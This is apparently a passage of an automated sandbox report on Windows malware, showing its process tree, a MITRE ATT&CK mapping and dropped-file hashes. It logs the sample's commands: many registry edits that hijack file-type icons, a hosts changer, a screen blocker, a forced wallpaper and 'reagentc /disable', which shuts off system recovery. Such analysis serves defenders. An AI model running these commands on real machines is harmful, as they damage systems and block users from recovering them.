C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 126 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
12⤵
PID:5844

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 127 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
12⤵
PID:5848

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 128 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
12⤵
PID:5696

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 129 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
12⤵
PID:5868

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 130 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
12⤵
PID:5180

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 131 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
12⤵
PID:5228

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 132 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
12⤵
PID:5732

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 133 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
12⤵
PID:3984

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 134 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
12⤵
PID:1376

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 135 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
12⤵
PID:5324

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 136 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
12⤵
PID:5332

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 137 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
12⤵
PID:5168

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 138 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
12⤵
PID:5808

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 139 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
12⤵
PID:5236

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 140 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
12⤵
PID:3156

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 141 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
12⤵
PID:5260

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 142 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
12⤵
PID:6092

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 143 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
12⤵
PID:308

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 144 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
12⤵
PID:6120

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 145 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
12⤵
PID:5436

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 146 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
12⤵
PID:6124

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 147 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
12⤵
PID:3344

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 148 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
12⤵
PID:6132

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 149 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
12⤵
PID:5468

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 150 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
12⤵
PID:3960

C:\java\protection\start\starticons.exe
C:\java\protection\start\starticons.exe
8⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:1656

C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\5DC6.tmp\5DC7.tmp\5DC8.bat C:\java\protection\start\starticons.exe"
9⤵
PID:1868

C:\java\protection\icons.exe
C:\java\protection\icons.exe
10⤵
PID:404

C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\5FAA.tmp\5FBB.tmp\5FBC.bat C:\java\protection\icons.exe"
11⤵
PID:3324

C:\Windows\system32\reg.exe
reg add "HKEY_CLASSES_ROOT\exefile\DefaultIcon" /ve /t REG_SZ /d "C:\java\icons\1.ico" /f
12⤵
PID:1564

C:\Windows\system32\reg.exe
reg add "HKEY_CLASSES_ROOT\txtfile\DefaultIcon" /ve /t REG_SZ /d "C:\java\icons\1.ico" /f
12⤵
PID:2788

C:\Windows\system32\reg.exe
reg add "HKEY_CLASSES_ROOT\batfile\DefaultIcon" /ve /t REG_SZ /d "C:\java\icons\1.ico" /f
12⤵
PID:2192

C:\Windows\system32\reg.exe
reg add "HKEY_CLASSES_ROOT\blendfile\DefaultIcon" /ve /t REG_SZ /d "C:\java\icons\2.ico" /f
12⤵
PID:5224

C:\Windows\system32\reg.exe
reg add "HKEY_CLASSES_ROOT\dllfile\DefaultIcon" /ve /t REG_SZ /d "C:\java\icons\2.ico" /f
12⤵
PID:5496

C:\Windows\system32\reg.exe
reg add "HKEY_CLASSES_ROOT\AutoHotkeyScript\DefaultIcon" /ve /t REG_SZ /d "C:\java\icons\2.ico" /f
12⤵
PID:5652

C:\Windows\system32\reg.exe
reg add "HKEY_CLASSES_ROOT\pngfile\DefaultIcon" /ve /t REG_SZ /d "C:\java\icons\2.ico" /f
12⤵
PID:6004

C:\Windows\system32\reg.exe
reg add "HKEY_CLASSES_ROOT\jpegfile\DefaultIcon" /ve /t REG_SZ /d "C:\java\icons\1.ico" /f
12⤵
PID:6108

C:\Windows\system32\reg.exe
reg add "HKEY_CLASSES_ROOT\giffile\DefaultIcon" /ve /t REG_SZ /d "C:\java\icons\2.ico" /f
12⤵
PID:3824

C:\Windows\system32\reg.exe
reg add "HKEY_CLASSES_ROOT\bittorrent\DefaultIcon" /ve /t REG_SZ /d "C:\java\icons\2.ico" /f
12⤵
PID:4980

C:\Windows\system32\reg.exe
reg add "HKEY_CLASSES_ROOT\cmdfile\DefaultIcon" /ve /t REG_SZ /d "C:\java\icons\2.ico" /f
12⤵
PID:5452

C:\Windows\system32\reg.exe
reg add "HKEY_CLASSES_ROOT\dbfile\DefaultIcon" /ve /t REG_SZ /d "C:\java\icons\2.ico" /f
12⤵
PID:5404

C:\Windows\system32\reg.exe
reg add "HKEY_CLASSES_ROOT\Drive\DefaultIcon" /ve /t REG_SZ /d "C:\java\icons\2.ico" /f
12⤵
PID:5472

C:\Windows\system32\reg.exe
reg add "HKEY_CLASSES_ROOT\DVD\DefaultIcon" /ve /t REG_SZ /d "C:\java\icons\2.ico" /f
12⤵
PID:5396

C:\Windows\system32\reg.exe
reg add "HKEY_CLASSES_ROOT\docxfile\DefaultIcon" /ve /t REG_SZ /d "C:\java\icons\1.ico" /f
12⤵
PID:236

C:\Windows\system32\reg.exe
reg add "HKEY_CLASSES_ROOT\htmlfile\DefaultIcon" /ve /t REG_SZ /d "C:\java\icons\1.ico" /f
12⤵
PID:292

C:\Windows\system32\reg.exe
reg add "HKEY_CLASSES_ROOT\http\DefaultIcon" /ve /t REG_SZ /d "C:\java\icons\1.ico" /f
12⤵
PID:5500

C:\Windows\system32\reg.exe
reg add "HKEY_CLASSES_ROOT\mhtmlfile\DefaultIcon" /ve /t REG_SZ /d "C:\java\icons\1.ico" /f
12⤵
PID:5248

C:\Windows\system32\reg.exe
reg add "HKEY_CLASSES_ROOT\Folder\DefaultIcon" /ve /t REG_SZ /d "C:\java\icons\6.ico" /f
12⤵
PID:5204

C:\Windows\system32\reg.exe
reg add "HKEY_CLASSES_ROOT\https\DefaultIcon" /ve /t REG_SZ /d "C:\java\icons\6.ico" /f
12⤵
PID:244

C:\Windows\system32\reg.exe
reg add "HKEY_CLASSES_ROOT\icofile\DefaultIcon" /ve /t REG_SZ /d "C:\java\icons\6.ico" /f
12⤵
PID:2236

C:\Windows\system32\reg.exe
reg add "HKEY_CLASSES_ROOT\inifile\DefaultIcon" /ve /t REG_SZ /d "C:\java\icons\6.ico" /f
12⤵
PID:3724

C:\Windows\system32\reg.exe
reg add "HKEY_CLASSES_ROOT\mscfile\DefaultIcon" /ve /t REG_SZ /d "C:\java\icons\6.ico" /f
12⤵
PID:4548

C:\Windows\system32\reg.exe
reg add "HKEY_CLASSES_ROOT\ms-excel\DefaultIcon" /ve /t REG_SZ /d "C:\java\icons\2.ico" /f
12⤵
PID:5540

C:\Windows\system32\reg.exe
reg add "HKEY_CLASSES_ROOT\ms-publisher\DefaultIcon" /ve /t REG_SZ /d "C:\java\icons\2.ico" /f
12⤵
PID:5772

C:\Windows\system32\reg.exe
reg add "HKEY_CLASSES_ROOT\ms-word\DefaultIcon" /ve /t REG_SZ /d "C:\java\icons\2.ico" /f
12⤵
PID:5880

C:\Windows\system32\reg.exe
reg add "HKEY_CLASSES_ROOT\ms-access\DefaultIcon" /ve /t REG_SZ /d "C:\java\icons\2.ico" /f
12⤵
PID:5716

C:\Windows\system32\reg.exe
reg add "HKEY_CLASSES_ROOT\MSInfoFile\DefaultIcon" /ve /t REG_SZ /d "C:\java\icons\6.ico" /f
12⤵
PID:5580

C:\Windows\system32\reg.exe
reg add "HKEY_CLASSES_ROOT\Python.File\DefaultIcon" /ve /t REG_SZ /d "C:\java\icons\1.ico" /f
12⤵
PID:5756

C:\Windows\system32\reg.exe
reg add "HKEY_CLASSES_ROOT\regfile\DefaultIcon" /ve /t REG_SZ /d "C:\java\icons\2.ico" /f
12⤵
PID:5592

C:\Windows\system32\reg.exe
reg add "HKEY_CLASSES_ROOT\steamlink\DefaultIcon" /ve /t REG_SZ /d "C:\java\icons\6.ico" /f
12⤵
PID:6008

C:\Windows\system32\reg.exe
reg add "HKEY_CLASSES_ROOT\steam\DefaultIcon" /ve /t REG_SZ /d "C:\java\icons\4.ico" /f
12⤵
PID:5984

C:\Windows\system32\reg.exe
reg add "HKEY_CLASSES_ROOT\svgfile\DefaultIcon" /ve /t REG_SZ /d "C:\java\icons\6.ico" /f
12⤵
PID:6024

C:\Windows\system32\reg.exe
reg add "HKEY_CLASSES_ROOT\themefile\DefaultIcon" /ve /t REG_SZ /d "C:\java\icons\6.ico" /f
12⤵
PID:5936

C:\Windows\system32\reg.exe
reg add "HKEY_CLASSES_ROOT\themepackfile\DefaultIcon" /ve /t REG_SZ /d "C:\java\icons\6.ico" /f
12⤵
PID:6088

C:\Windows\system32\reg.exe
reg add "HKEY_CLASSES_ROOT\VBSFile\DefaultIcon" /ve /t REG_SZ /d "C:\java\icons\1.ico" /f
12⤵
PID:6016

C:\Windows\system32\reg.exe
reg add "HKEY_CLASSES_ROOT\xmlfile\DefaultIcon" /ve /t REG_SZ /d "C:\java\icons\6.ico" /f
12⤵
PID:6068

C:\Windows\system32\reg.exe
reg add "HKEY_CLASSES_ROOT\WinRAR\DefaultIcon" /ve /t REG_SZ /d "C:\java\icons\1.ico" /f
12⤵
PID:5868

C:\Windows\system32\reg.exe
reg add "HKEY_CLASSES_ROOT\Windows.VhdFile\DefaultIcon" /ve /t REG_SZ /d "C:\java\icons\6.ico" /f
12⤵
PID:6052

C:\Windows\system32\reg.exe
reg add "HKEY_CLASSES_ROOT\SearchFolder\DefaultIcon" /ve /t REG_SZ /d "C:\java\icons\6.ico" /f
12⤵
PID:5232

C:\Windows\system32\reg.exe
reg add "HKEY_CLASSES_ROOT\Paint.Picture\DefaultIcon" /ve /t REG_SZ /d "C:\java\icons\6.ico" /f
12⤵
PID:6140

C:\Windows\system32\reg.exe
reg add "HKEY_CLASSES_ROOT\mhtmlfile\DefaultIcon" /ve /t REG_SZ /d "C:\java\icons\2.ico" /f
12⤵
PID:5028

C:\Windows\system32\reg.exe
reg add "HKEY_CLASSES_ROOT\inffile\DefaultIcon" /ve /t REG_SZ /d "C:\java\icons\1.ico" /f
12⤵
PID:5332

C:\Windows\system32\reg.exe
reg add "HKEY_CLASSES_ROOT\JSFile\DefaultIcon" /ve /t REG_SZ /d "C:\java\icons\1.ico" /f
12⤵
PID:1956

C:\Windows\system32\reg.exe
reg add "HKEY_CLASSES_ROOT\JSEFile\DefaultIcon" /ve /t REG_SZ /d "C:\java\icons\1.ico" /f
12⤵
PID:308

C:\Windows\system32\reg.exe
reg add "HKEY_CLASSES_ROOT\ftp\DefaultIcon" /ve /t REG_SZ /d "C:\java\icons\2.ico" /f
12⤵
PID:5444

C:\Windows\system32\reg.exe
reg add "HKEY_CLASSES_ROOT\Word.Document.8\DefaultIcon" /ve /t REG_SZ /d "C:\java\icons\2.ico" /f
12⤵
PID:6116

C:\Windows\system32\reg.exe
reg add "HKEY_CLASSES_ROOT\Word.Document.12\DefaultIcon" /ve /t REG_SZ /d "C:\java\icons\2.ico" /f
12⤵
PID:6132

C:\Windows\system32\reg.exe
reg add "HKEY_CLASSES_ROOT\Word.RTF.8\DefaultIcon" /ve /t REG_SZ /d "C:\java\icons\2.ico" /f
12⤵
PID:5476

C:\Windows\system32\reg.exe
reg add "HKEY_CLASSES_ROOT\wordhtmlfile\DefaultIcon" /ve /t REG_SZ /d "C:\java\icons\2.ico" /f
12⤵
PID:5464

C:\Windows\system32\reg.exe
reg add "HKEY_CLASSES_ROOT\wordhtmltemplate\DefaultIcon" /ve /t REG_SZ /d "C:\java\icons\2.ico" /f
12⤵
PID:5344

C:\Windows\system32\reg.exe
reg add "HKEY_CLASSES_ROOT\wordmhtmlfile\DefaultIcon" /ve /t REG_SZ /d "C:\java\icons\2.ico" /f
12⤵
PID:236

C:\Windows\system32\reg.exe
reg add "HKEY_CLASSES_ROOT\Wordpad.Document.1\DefaultIcon" /ve /t REG_SZ /d "C:\java\icons\2.ico" /f
12⤵
PID:5420

C:\Windows\system32\reg.exe
reg add "HKEY_CLASSES_ROOT\wordxmlfile\DefaultIcon" /ve /t REG_SZ /d "C:\java\icons\2.ico" /f
12⤵
PID:5484

C:\Windows\system32\reg.exe
reg add "HKEY_CLASSES_ROOT\uTorrent\DefaultIcon" /ve /t REG_SZ /d "C:\java\icons\1.ico" /f
12⤵
PID:3332

C:\Windows\system32\ie4uinit.exe
ie4uinit.exe -show
12⤵
PID:1656

C:\Windows\system32\ie4uinit.exe
ie4uinit.exe -show
8⤵
- Modifies Installed Components in the registry
- Modifies Internet Explorer settings
PID:1732

C:\java\protection\start\starthosts.exe
C:\java\protection\start\starthosts.exe
8⤵
PID:572

C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\60A4.tmp\60A5.tmp\60A6.bat C:\java\protection\start\starthosts.exe"
9⤵
PID:2908

C:\java\ban\hosts.exe
C:\java\ban\hosts.exe
10⤵
PID:2720

C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\6279.tmp\627A.tmp\627B.bat C:\java\ban\hosts.exe"
11⤵
PID:1660

C:\java\protection\start\startWPChanger.exe
C:\java\protection\start\startWPChanger.exe
8⤵
PID:1360

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\60C4.tmp\60C5.tmp\60C6.bat C:\java\protection\start\startWPChanger.exe"
9⤵
PID:2236

C:\java\Wallpaper\WPChanger.exe
C:\java\Wallpaper\WPChanger.exe C:\java\Wallpaper\clown.png
10⤵
PID:2988

C:\java\clown.exe
C:\java\clown.exe
8⤵
PID:2956

C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\60C5.tmp\60C5.tmp\60C6.bat C:\java\clown.exe"
9⤵
PID:5100

C:\java\protection\start\startvol.exe
C:\java\protection\start\startvol.exe
10⤵
PID:4200

C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\62F6.tmp\62F7.tmp\62F8.bat C:\java\protection\start\startvol.exe"
11⤵
PID:5148

C:\java\vol.exe
C:\java\vol.exe
12⤵
PID:5596

C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\6B14.tmp\6B15.tmp\6B16.bat C:\java\vol.exe"
13⤵
PID:5740

C:\Windows\system32\wscript.exe
wscript.exe "C:\java\vol.vbs"
14⤵
PID:5964

C:\Windows\system32\wscript.exe
wscript.exe "C:\java\morgalka.vbs"
14⤵
PID:3216

C:\java\protection\start\startScreenBlocker.exe
C:\java\protection\start\startScreenBlocker.exe
10⤵
PID:1956

C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\62F7.tmp\62F7.tmp\62F8.bat C:\java\protection\start\startScreenBlocker.exe"
11⤵
PID:2044

C:\java\ban\ScreenBlocker.exe
C:\java\ban\ScreenBlocker.exe
12⤵
PID:5336

C:\java\protection\start\startcur.exe
C:\java\protection\start\startcur.exe
10⤵
PID:2228

C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\6326.tmp\6326.tmp\6327.bat C:\java\protection\start\startcur.exe"
11⤵
PID:1876

C:\java\ban\cur.exe
C:\java\ban\cur.exe
12⤵
PID:5344

C:\java\attention.exe
C:\java\attention.exe
10⤵
PID:380

C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\6325.tmp\6326.tmp\6327.bat C:\java\attention.exe"
11⤵
PID:1000

C:\java\form.exe
C:\java\form.exe
12⤵
PID:5240

C:\Windows\system32\timeout.exe
timeout -t 10 -nobreak
12⤵
- Delays execution with timeout.exe
PID:5252

C:\Windows\system32\taskkill.exe
taskkill -f -im form.exe
12⤵
- Kills process with taskkill
PID:4044

C:\Windows\system32\ReAgentc.exe
reagentc /disable
10⤵
PID:5132

C:\java\protection\start\startWinlog.exe
C:\java\protection\start\startWinlog.exe
10⤵
PID:5528

C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\6A88.tmp\6A89.tmp\6A8A.bat C:\java\protection\start\startWinlog.exe"
11⤵
PID:5660

C:\java\protection\Winlog.exe
C:\java\protection\Winlog.exe
12⤵
PID:5900

C:\java\protection\start\startf.exe
C:\java\protection\start\startf.exe
10⤵
PID:5672

C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\6B82.tmp\6B83.tmp\6B84.bat C:\java\protection\start\startf.exe"
11⤵
PID:5916

C:\java\f\f.exe
C:\java\f\f.exe
12⤵
PID:6060

C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\6D08.tmp\6D09.tmp\6D0A.bat C:\java\f\f.exe"
13⤵
PID:4924

C:\java\protection\start\startban.exe
C:\java\protection\start\startban.exe
10⤵
PID:5696

C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\6BB0.tmp\6BB1.tmp\6BB2.bat C:\java\protection\start\startban.exe"
11⤵
PID:5976

C:\java\ban\ban.exe
C:\java\ban\ban.exe
12⤵
PID:6100

C:\java\ban\ban.exe
C:\java\ban\ban.exe
13⤵
PID:5320

C:\java\Wallpaper\engine\wp.exe
wp id
10⤵
PID:5796

C:\java\Wallpaper\engine\wp.exe
wp run mpv --wid=131748 C:\java\Wallpaper\engine\wallpapers\1.mp4 --loop=inf --player-operation-mode=pseudo-gui --force-window=yes
10⤵
PID:5504

C:\java\Wallpaper\engine\mpv.com
"C:\java\Wallpaper\engine\mpv.com" "--wid=131748" "C:\java\Wallpaper\engine\wallpapers\1.mp4" "--loop=inf" "--player-operation-mode=pseudo-gui" "--force-window=yes"
11⤵
PID:1876

C:\java\Wallpaper\engine\mpv.exe
"C:\java\Wallpaper\engine\mpv.com" "--wid=131748" "C:\java\Wallpaper\engine\wallpapers\1.mp4" "--loop=inf" "--player-operation-mode=pseudo-gui" "--force-window=yes"
12⤵
PID:228

C:\java\hide.exe
C:\java\hide.exe
10⤵
PID:2060

C:\Windows\system32\timeout.exe
timeout -t 20 -nobreak
10⤵
- Delays execution with timeout.exe
PID:1420

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
1⤵
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:4580

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffa4781ab58,0x7ffa4781ab68,0x7ffa4781ab78
2⤵
PID:3584

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1512 --field-trial-handle=1808,i,17715129828894152840,8876401464032263256,131072 /prefetch:2
2⤵
PID:3424

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2108 --field-trial-handle=1808,i,17715129828894152840,8876401464032263256,131072 /prefetch:8
2⤵
PID:1984

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=2200 --field-trial-handle=1808,i,17715129828894152840,8876401464032263256,131072 /prefetch:8
2⤵
PID:4140

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3156 --field-trial-handle=1808,i,17715129828894152840,8876401464032263256,131072 /prefetch:1
2⤵
PID:3624

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3188 --field-trial-handle=1808,i,17715129828894152840,8876401464032263256,131072 /prefetch:1
2⤵
PID:2520

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=2156 --field-trial-handle=1808,i,17715129828894152840,8876401464032263256,131072 /prefetch:1
2⤵
PID:2220

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4388 --field-trial-handle=1808,i,17715129828894152840,8876401464032263256,131072 /prefetch:8
2⤵
PID:1512

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4540 --field-trial-handle=1808,i,17715129828894152840,8876401464032263256,131072 /prefetch:8
2⤵
PID:4912

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4724 --field-trial-handle=1808,i,17715129828894152840,8876401464032263256,131072 /prefetch:8
2⤵
PID:3228

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4432 --field-trial-handle=1808,i,17715129828894152840,8876401464032263256,131072 /prefetch:8
2⤵
PID:1812

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4808 --field-trial-handle=1808,i,17715129828894152840,8876401464032263256,131072 /prefetch:8
2⤵
PID:1020

C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe"
1⤵
PID:3324

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:3844

C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x00000000000004CC 0x00000000000004C4
1⤵
PID:5832

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Windows Management Instrumentation

T1047

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Indicator Removal

T1070

File Deletion

T1070.004

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Inhibit System Recovery

T1490

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\Drivers\curl-ca-bundle.crt
Filesize
210KB

MD5
aa5ac583708ca35225ac2d230f4acb62

SHA1
45bb287f6463b6ffbba91bfbece28e02e1c8b07b

SHA256
08df40e8f528ed283b0e480ba4bcdbfdd2fdcf695a7ada1668243072d80f8b6f

SHA512
91266bcf97d879828c26beba82e15ff73aa676d800e11401da22b0a565e980912222e02e9a9cc7daff7ceddf78309d8fb0adef6a4eaff9cefa73b72a97281bc2

Download Submit
C:\ProgramData\Drivers\curl.exe
Filesize
5.5MB

MD5
